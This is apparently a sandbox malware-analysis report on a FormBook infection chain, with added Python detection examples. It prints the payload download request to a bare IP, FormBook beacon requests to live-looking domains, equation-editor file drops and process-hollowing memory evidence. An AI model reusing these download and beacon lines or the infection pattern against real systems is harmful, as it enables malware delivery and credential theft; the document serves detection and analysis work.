            Source: vbc.exe, 00000003.00000002.417839615.0000000006BE7000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.419756160.0000000002CC7000.00000002.00020000.sdmp | String found in binary or memory: http://localizability/practices/XML.asp
            Source: vbc.exe, 00000003.00000002.417839615.0000000006BE7000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.419756160.0000000002CC7000.00000002.00020000.sdmp | String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
            Source: vbc.exe, 00000003.00000002.416641477.0000000006610000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.416658417.0000000001BE0000.00000002.00020000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
            Source: explorer.exe, 00000005.00000000.457413401.0000000003E50000.00000002.00020000.sdmp | String found in binary or memory: http://servername/isapibackend.dll
            Source: vbc.exe, 00000003.00000002.417839615.0000000006BE7000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.419756160.0000000002CC7000.00000002.00020000.sdmp | String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
            Source: explorer.exe, 00000005.00000000.420524070.0000000003D90000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.438182629.0000000003D90000.00000004.00000001.sdmp | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
            Source: explorer.exe, 00000005.00000000.456132086.000000000031D000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.423102805.00000000083F5000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.420524070.0000000003D90000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.438182629.0000000003D90000.00000004.00000001.sdmp | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
            Source: explorer.exe, 00000005.00000000.421368152.0000000004650000.00000002.00020000.sdmp | String found in binary or memory: http://treyresearch.net
            Source: explorer.exe, 00000005.00000000.421368152.0000000004650000.00000002.00020000.sdmp | String found in binary or memory: http://wellformedweb.org/CommentAPI/
            Source: vbc.exe, 00000003.00000002.417839615.0000000006BE7000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.419756160.0000000002CC7000.00000002.00020000.sdmp | String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
            Source: vbc.exe, 00000003.00000002.416641477.0000000006610000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.416658417.0000000001BE0000.00000002.00020000.sdmp | String found in binary or memory: http://www.%s.comPA
            Source: explorer.exe, 00000005.00000000.424665846.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.456041040.0000000000255000.00000004.00000020.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3
            Source: explorer.exe, 00000005.00000000.421368152.0000000004650000.00000002.00020000.sdmp | String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
            Source: explorer.exe, 00000005.00000000.418334987.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: http://www.hotmail.com/oe
            Source: vbc.exe, 00000003.00000002.417839615.0000000006BE7000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.419756160.0000000002CC7000.00000002.00020000.sdmp | String found in binary or memory: http://www.icra.org/vocabulary/.
            Source: explorer.exe, 00000005.00000000.421368152.0000000004650000.00000002.00020000.sdmp | String found in binary or memory: http://www.iis.fhg.de/audioPA
            Source: explorer.exe, 00000005.00000000.421025770.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.438992148.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.457833157.000000000449C000.00000004.00000001.sdmp | String found in binary or memory: http://www.msn.com/?ocid=iehp
            Source: explorer.exe, 00000005.00000000.421025770.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.438992148.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.457833157.000000000449C000.00000004.00000001.sdmp | String found in binary or memory: http://www.msn.com/?ocid=iehpg
            Source: explorer.exe, 00000005.00000000.420524070.0000000003D90000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.438182629.0000000003D90000.00000004.00000001.sdmp | String found in binary or memory: http://www.msn.com/?ocid=iehps
            Source: explorer.exe, 00000005.00000000.421025770.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.438992148.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.457833157.000000000449C000.00000004.00000001.sdmp | String found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
            Source: explorer.exe, 00000005.00000000.418334987.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: http://www.msnbc.com/news/ticker.txt
            Source: explorer.exe, 00000005.00000000.433667543.0000000008418000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.435363955.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.424711356.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.423050629.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.423102805.00000000083F5000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.421059058.00000000044E7000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.441652368.0000000008374000.00000004.00000001.sdmp | String found in binary or memory: http://www.piriform.com/ccleaner
            Source: explorer.exe, 00000005.00000000.433667543.0000000008418000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.435363955.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.424711356.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.423050629.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.423102805.00000000083F5000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.441652368.0000000008374000.00000004.00000001.sdmp | String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
            Source: explorer.exe, 00000005.00000000.418334987.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: http://www.windows.com/pctv.
            Source: explorer.exe, 00000005.00000000.441652368.0000000008374000.00000004.00000001.sdmp | String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
            Source: explorer.exe, 00000005.00000000.424665846.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.423050629.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.421059058.00000000044E7000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.456041040.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.441652368.0000000008374000.00000004.00000001.sdmp | String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
            Source: explorer.exe, 00000005.00000000.421059058.00000000044E7000.00000004.00000001.sdmp | String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1-220
            Source: explorer.exe, 00000005.00000000.424665846.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.456041040.0000000000255000.00000004.00000020.sdmp | String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=18(P&
            Source: explorer.exe, 00000005.00000000.421288700.00000000045D6000.00000004.00000001.sdmp | String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEM
            Source: explorer.exe, 00000005.00000000.424665846.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.456041040.0000000000255000.00000004.00000020.sdmp | String found in binary or memory: https://support.mozilla.org
            Source: explorer.exe, 00000005.00000000.424665846.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.456041040.0000000000255000.00000004.00000020.sdmp | String found in binary or memory: https://www.mozilla.org
            Source: explorer.exe, 00000005.00000000.424665846.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.456041040.0000000000255000.00000004.00000020.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B3E201F6-E172-4FB7-8EA2-C5E78A0177C3}.tmp
            Source: unknown | DNS traffic detected: queries for: www.mountfrenchlodge.net
            Source: global traffic | HTTP traffic detected:
                GET /70007/vbc.exe HTTP/1.1
                Accept: */*
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: 198.46.199.153
                Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected:
                GET /9gr5/?gvT8Z=xQZabMU8dpACe7vSnuiwD/QS3vczr7oZL8st36+z5QOTIlaedyvl1J6mLYwfvajeV4x6zA==&wrx=KX64Xbs0GT8 HTTP/1.1
                Host: www.mountfrenchlodge.net
                Connection: close
                Data Raw: 00 00 00 00 00 00 00
                Data Ascii: (seven 0x00 bytes, nothing printable)
            Source: global traffic | HTTP traffic detected:
                GET /9gr5/?gvT8Z=ywSUfm2fQGK6UvQCK3y+m09HhIkd7Ec2I38ZOQmE/hAglw7BpPTyU9WfPvviQ4VjNkYSbA==&wrx=KX64Xbs0GT8 HTTP/1.1
                Host: www.cuteprofessionalscrubs.com
                Connection: close
                Data Raw: 00 00 00 00 00 00 00
                Data Ascii: (seven 0x00 bytes, nothing printable)
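The three requests above are the whole network side of this run in two shapes: the stage-two fetch of vbc.exe from a bare IP with an MSIE 7 / Trident user agent, and two FormBook check-ins (a short random-looking directory, a two-parameter query carrying one base64 blob, Connection: close, and a NUL-filled body on a GET). The classifier below is an added example written for this page, not part of the Joe Sandbox report or of any published rule; its thresholds (directory length 2 to 8, at least 32 decoded bytes, three reasons for a verdict) are the author's assumptions, and the benign request is constructed.

```python
import base64
import re

# Requests as they appear in the report, re-assembled as raw HTTP/1.1 text. The
# seven 0x00 body bytes on the two beacons are the "Data Raw" the sandbox
# captured. The last entry is a constructed benign request for comparison.
MSIE_UA = ("Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; "
           "SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; "
           "Media Center PC 6.0; .NET4.0C; .NET4.0E)")
REQUESTS = {
    "payload_fetch": (
        "GET /70007/vbc.exe HTTP/1.1\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\n"
        "User-Agent: " + MSIE_UA + "\r\nHost: 198.46.199.153\r\nConnection: Keep-Alive\r\n\r\n"
    ),
    "beacon_1": (
        "GET /9gr5/?gvT8Z=xQZabMU8dpACe7vSnuiwD/QS3vczr7oZL8st36+z5QOTIlaedyvl1J6mLYwfvajeV4x6zA=="
        "&wrx=KX64Xbs0GT8 HTTP/1.1\r\nHost: www.mountfrenchlodge.net\r\nConnection: close\r\n\r\n"
        + "\x00" * 7
    ),
    "beacon_2": (
        "GET /9gr5/?gvT8Z=ywSUfm2fQGK6UvQCK3y+m09HhIkd7Ec2I38ZOQmE/hAglw7BpPTyU9WfPvviQ4VjNkYSbA=="
        "&wrx=KX64Xbs0GT8 HTTP/1.1\r\nHost: www.cuteprofessionalscrubs.com\r\nConnection: close\r\n\r\n"
        + "\x00" * 7
    ),
    "benign": "GET /index.html?lang=en HTTP/1.1\r\nHost: www.example.com\r\nConnection: keep-alive\r\n\r\n",
}

IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
SHORT_DIR = re.compile(r"^/[A-Za-z0-9]{2,8}/$")   # e.g. /9gr5/ (length bounds assumed)
PE_EXTENSIONS = (".exe", ".dll", ".scr")


def parse_request(raw):
    """Split a raw HTTP/1.x request into (method, path, query, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    path, _, query = target.partition("?")
    headers = {}
    for line in lines[1:]:
        if line:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
    return method, path, query, headers, body


def query_params(query):
    """Split the query by hand: urllib.parse.parse_qsl turns '+' into ' ',
    which would corrupt the base64 values we want to inspect."""
    pairs = []
    for part in query.split("&"):
        if part:
            key, _, value = part.partition("=")
            pairs.append((key, value))
    return pairs


def looks_base64_blob(value, min_bytes=32):
    """True for a well-formed base64 string decoding to at least min_bytes."""
    if not re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", value) or len(value) % 4:
        return False
    try:
        return len(base64.b64decode(value, validate=True)) >= min_bytes
    except ValueError:   # binascii.Error is a ValueError
        return False


def classify(raw):
    """Return (verdict, reasons) for one raw request."""
    method, path, query, headers, body = parse_request(raw)
    host = headers.get("host", "")
    reasons = []

    # 1. Stage-two fetch: a PE pulled from an IP-literal host, no DNS involved.
    if IPV4.match(host) and path.lower().endswith(PE_EXTENSIONS):
        reasons.append("PE download from IP-literal host %s" % host)
        return "payload_download_from_ip", reasons

    # 2. FormBook-style beacon: each trait alone is weak, three together are not.
    if method == "GET" and SHORT_DIR.match(path):
        reasons.append("short random-looking directory %s" % path)
    params = query_params(query)
    if len(params) == 2 and any(looks_base64_blob(v) for _, v in params):
        reasons.append("two query parameters, one a base64 blob")
    if headers.get("connection", "").lower() == "close":
        reasons.append("Connection: close")
    if body and all(ch == "\x00" for ch in body):
        reasons.append("%d NUL body bytes on a GET" % len(body))
    if len(reasons) >= 3:
        return "formbook_beacon", reasons
    return "benign", reasons


def scan(requests):
    """Map each named request to its verdict."""
    return {name: classify(raw)[0] for name, raw in requests.items()}


if __name__ == "__main__":
    for name, raw in REQUESTS.items():
        verdict, reasons = classify(raw)
        print("%-14s %-26s %s" % (name, verdict, "; ".join(reasons)))
```

The query is split by hand on purpose: the blob contains '+' and '/', and the standard parse_qsl would silently turn the '+' into a space and make the value fail base64 validation. The same base64 check also tells the two parameters apart: the short second value (wrx=KX64Xbs0GT8) is not a multiple of four characters and is rejected.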

            E-Banking Fraud:

            Yara detected FormBook
            Source: Yara match | File source: 4.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000000.442632634.00000000098BF000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000000.413230327.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.415523369.0000000003559000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000000.412873082.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.482437472.0000000000370000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.665645508.0000000001BC0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000000.434267788.00000000098BF000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.665856666.0000000001BF0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.482329327.0000000000130000.00000040.00020000.sdmp, type: MEMORY
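The memory-dump names in these rows say where each FormBook hit lives. The decoder below is an added example for this page, not Joe Sandbox code: it assumes the dotted fields are process index, dump pass, dump id, region base address, page protection and a flags word (the base address and protection are the two fields whose meaning is confirmed by the rows themselves, since 0x400000 matches the 4.0.vbc.exe.400000.* unpack names and 0x40 is PAGE_EXECUTE_READWRITE), decodes the protection with the winnt.h constants, and picks out the hits that sit in RWX memory at the default 32-bit image base of process 4, the pattern left behind when an unpacked PE is written over a hollowed child.

```python
import re
from collections import Counter

# Dump names exactly as they appear in the Yara rows above.
YARA_HITS = [
    "00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp",
    "00000005.00000000.442632634.00000000098BF000.00000040.00020000.sdmp",
    "00000004.00000000.413230327.0000000000400000.00000040.00000001.sdmp",
    "00000003.00000002.415523369.0000000003559000.00000004.00000001.sdmp",
    "00000004.00000000.412873082.0000000000400000.00000040.00000001.sdmp",
    "00000004.00000002.482437472.0000000000370000.00000040.00020000.sdmp",
    "00000006.00000002.665645508.0000000001BC0000.00000040.00020000.sdmp",
    "00000005.00000000.434267788.00000000098BF000.00000040.00020000.sdmp",
    "00000006.00000002.665856666.0000000001BF0000.00000004.00000001.sdmp",
    "00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp",
    "00000004.00000002.482329327.0000000000130000.00000040.00020000.sdmp",
]

# Page-protection values from winnt.h, used to decode the fifth field.
PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}

# Process index -> image, read off this report's own rows (3 and 4 are the two
# vbc.exe stages, 5 is explorer.exe); process 6 is not named in the rows shown.
PROCESS_IMAGE = {3: "vbc.exe", 4: "vbc.exe", 5: "explorer.exe"}

# Assumed field layout (not documented on the page):
#   process index . dump pass . dump id . region base . page protection . flags
SDMP_NAME = re.compile(
    r"^(?P<proc>[0-9A-F]{8})\.(?P<dump_pass>[0-9A-F]{8})\.(?P<dump_id>\d+)\."
    r"(?P<base>[0-9A-F]{16})\.(?P<protect>[0-9A-F]{8})\.(?P<flags>[0-9A-F]{8})\.sdmp$",
    re.IGNORECASE,
)


def parse_sdmp(name):
    """Decode one dump name into a dict; raises ValueError on a foreign name."""
    m = SDMP_NAME.match(name)
    if not m:
        raise ValueError("not a sandbox dump name: %s" % name)
    proc = int(m["proc"], 16)
    protect = int(m["protect"], 16)
    return {
        "process": proc,
        "image": PROCESS_IMAGE.get(proc, "unknown"),
        "dump_pass": int(m["dump_pass"], 16),   # 0 and 2 in this report; meaning assumed
        "base": int(m["base"], 16),
        "protect": PAGE_PROTECTION.get(protect & 0xFF, "0x%x" % protect),
        # 0x20000 equals MEM_PRIVATE, but 0x1 maps to no MEM_* value, so keep it raw.
        "flags": int(m["flags"], 16),
    }


def rwx_hits(names):
    """Hits in writable+executable memory: code that was written at run time."""
    return [r for r in map(parse_sdmp, names) if r["protect"] == "PAGE_EXECUTE_READWRITE"]


def image_base_hits(names, image_base=0x400000):
    """RWX hits exactly at the default 32-bit image base. A legitimately mapped
    image is MEM_IMAGE with per-section protection; an RWX region there means the
    original image was replaced in memory (process hollowing)."""
    return [r for r in rwx_hits(names) if r["base"] == image_base]


def hits_per_process(names):
    return Counter(parse_sdmp(n)["process"] for n in names)


if __name__ == "__main__":
    for r in map(parse_sdmp, YARA_HITS):
        print("proc %d (%s) base 0x%08x %s" % (r["process"], r["image"], r["base"], r["protect"]))
    print("hollowed image base hits:", len(image_base_hits(YARA_HITS)))
```

Of the eleven hits, only the two PAGE_READWRITE regions (process 3 at 0x3559000 and process 6 at 0x1BF0000) are data rather than live code; everything else is RWX, and three of those sit at 0x400000 in process 4, the hollowed second vbc.exe.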

            System Summary:

            Malicious sample detected (through community Yara rule)
            Each source below matched both community rules: "autogenerated rule brought to you by yara-signator" (Author: Felix Bilstein - yara-signator at cocacoding dot com) and "detect Formbook in memory" (Author: JPCERT/CC Incident Response Group).
            Source: 4.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
            Source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
            Source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
            Source: 4.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
            Source: 4.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
            Source: 4.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE
            Source: 4.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
            Source: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
            Source: 00000005.00000000.442632634.00000000098BF000.00000040.00020000.sdmp, type: MEMORY
            Source: 00000004.00000000.413230327.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: 00000003.00000002.415523369.0000000003559000.00000004.00000001.sdmp, type: MEMORY
            Source: 00000004.00000000.412873082.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: 00000004.00000002.482437472.0000000000370000.00000040.00020000.sdmp, type: MEMORY
            Source: 00000006.00000002.665645508.0000000001BC0000.00000040.00020000.sdmp, type: MEMORY
            Source: 00000005.00000000.434267788.00000000098BF000.00000040.00020000.sdmp, type: MEMORY
            Source: 00000006.00000002.665856666.0000000001BF0000.00000004.00000001.sdmp, type: MEMORY
            Source: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: 00000004.00000002.482329327.0000000000130000.00000040.00020000.sdmp, type: MEMORY
            Office equation editor drops PE file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
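The two rows above are the drop; the rest of the chain is that EQNEDT32.EXE then runs what it wrote. The rules below are an added example for this page, not part of the report and not a Sigma rule: they run over constructed Sysmon-shaped events (EventID 11 FileCreate, EventID 1 ProcessCreate, with Sysmon's Image, ParentImage and TargetFilename field names) built from the paths the report lists, and correlate a PE written by the equation editor with a later execution of that same path. The svchost.exe parent of EQNEDT32.EXE and the second vbc.exe launch are constructed, not taken from the rows shown; the user-writable directory list is the author's choice.

```python
from collections import Counter

EQNEDT32_PATH = "C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE"
PE_EXTENSIONS = (".exe", ".dll", ".scr", ".cpl")
# Directories a limited user, and therefore an exploited Office process, can write to.
USER_WRITABLE = ("c:\\users\\public\\", "\\appdata\\local\\", "\\appdata\\roaming\\", "\\temp\\")

# Constructed Sysmon-style events in the order the report implies. EQNEDT32.EXE
# is a COM server started by the DCOM launcher, so its parent is svchost.exe and
# not WINWORD.EXE: a rule keyed on "Word spawns a child" never sees this chain,
# which is why every rule below keys on EQNEDT32.EXE itself.
EVENTS = [
    {"EventID": 1, "Image": EQNEDT32_PATH,
     "ParentImage": "C:\\Windows\\System32\\svchost.exe"},
    {"EventID": 11, "Image": "C:\\Program Files\\Microsoft Office\\Office14\\WINWORD.EXE",
     "TargetFilename": "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files"
                       "\\Content.Word\\~WRS{B3E201F6-E172-4FB7-8EA2-C5E78A0177C3}.tmp"},
    {"EventID": 11, "Image": EQNEDT32_PATH,
     "TargetFilename": "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files"
                       "\\Content.IE5\\ZAE7RW1P\\vbc[1].exe"},
    {"EventID": 11, "Image": EQNEDT32_PATH,
     "TargetFilename": "C:\\Users\\Public\\vbc.exe"},
    {"EventID": 1, "Image": "C:\\Users\\Public\\vbc.exe",
     "ParentImage": EQNEDT32_PATH},
    # Second vbc.exe instance (the report's Yara rows show two vbc.exe processes,
    # 3 and 4); the parent relation here is constructed.
    {"EventID": 1, "Image": "C:\\Users\\Public\\vbc.exe",
     "ParentImage": "C:\\Users\\Public\\vbc.exe"},
]


def detect(events):
    """Return (rule, detail) findings for an ordered event stream.

    eqnedt32_drops_pe  EQNEDT32.EXE writes a file with a PE extension
    eqnedt32_spawns    EQNEDT32.EXE is the parent of a new process
    drop_and_run       a path EQNEDT32.EXE wrote earlier is executed
    """
    findings = []
    dropped = set()
    eqnedt32 = EQNEDT32_PATH.lower()
    for ev in events:
        image = ev["Image"].lower()
        if ev["EventID"] == 11:
            target = ev["TargetFilename"]
            if image == eqnedt32 and target.lower().endswith(PE_EXTENSIONS):
                dropped.add(target.lower())
                where = "user-writable" if any(d in target.lower() for d in USER_WRITABLE) else "other"
                findings.append(("eqnedt32_drops_pe", "%s (%s path)" % (target, where)))
        elif ev["EventID"] == 1:
            if ev["ParentImage"].lower() == eqnedt32:
                findings.append(("eqnedt32_spawns", ev["Image"]))
            if image in dropped:
                findings.append(("drop_and_run", ev["Image"]))
    return findings


def rule_counts(events):
    return Counter(rule for rule, _ in detect(events))


if __name__ == "__main__":
    for rule, detail in detect(EVENTS):
        print("%-18s %s" % (rule, detail))
```

The cache copy under Content.IE5 is the URLDownloadToFile artifact and the Public copy is what actually runs, so drop_and_run fires on the Public path only; the Word scratch file in Content.Word produces nothing because neither its extension nor its writer matches.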
            Yara signature match (full metadata of the two rules; every source below matched both)
            Matched rule: Formbook_1 | date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Matched rule: Formbook | author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 4.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
            Source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
            Source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
            Source: 4.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
            Source: 4.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
            Source: 4.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE
            Source: 4.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
            Source: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
            Source: 00000005.00000000.442632634.00000000098BF000.00000040.00020000.sdmp, type: MEMORY
            Source: 00000004.00000000.413230327.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: 00000003.00000002.415523369.0000000003559000.00000004.00000001.sdmp, type: MEMORY
            Source: 00000004.00000000.412873082.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: 00000004.00000002.482437472.0000000000370000.00000040.00020000.sdmp, type: MEMORY
            Source: 00000006.00000002.665645508.0000000001BC0000.00000040.00020000.sdmp, type: MEMORY
            Source: 00000005.00000000.434267788.00000000098BF000.00000040.00020000.sdmp, type: MEMORY
            Source: 00000006.00000002.665856666.0000000001BF0000.00000004.00000001.sdmp, type: MEMORY
            Source: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: 00000004.00000002.482329327.0000000000130000.00000040.00020000.sdmp, type: MEMORY
            Source: C:\Users\Public\vbc.exe | Code function: 3_2_0109A2A9
            Source: C:\Users\Public\vbc.exe | Code function: 3_2_0045655F
            Source: C:\Users\Public\vbc.exe | Code function: 3_2_00455918
            Source: C:\Users\Public\vbc.exe | Code function: 3_2_00455928
            Source: C:\Users\Public\vbc.exe | Code function: 3_2_00455B78
            Source: C:\Users\Public\vbc.exe | Code function: 3_2_0109A035
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00401030
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_0041DB58
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_0041E4E9
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00402D89
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00402D90
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_0041E59C
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_0041D5A3
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_0041EDB1
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_0041DE45
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00409E5C
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00409E60
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00402FB0
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_0109A2A9
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00A4E0C6
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00A7D005
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00ACD06D
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00A53040
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00A6905A
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00A4E2E9
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00AF1238
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00AF63BF
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00A4F3CF
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00A763DB
